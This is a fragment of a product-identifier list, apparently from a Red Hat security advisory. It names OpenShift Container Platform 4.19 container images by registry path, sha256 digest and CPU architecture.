"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:ed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:b391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:a8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:fcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:eec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:fb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:b8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:be5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:df471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:b46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:ab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:cf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:bfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:c1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:ce22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:aa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:c373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:b8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:eb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:c948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:c3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:dae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:fb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:e3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:fb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:a02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:d82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:e0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:fd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:bf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:b88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:ed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:a3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:dd33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:f2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:bf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:dda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:f51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:b71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:c471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:dbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:b06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:dae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:fdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef_ppc64le",
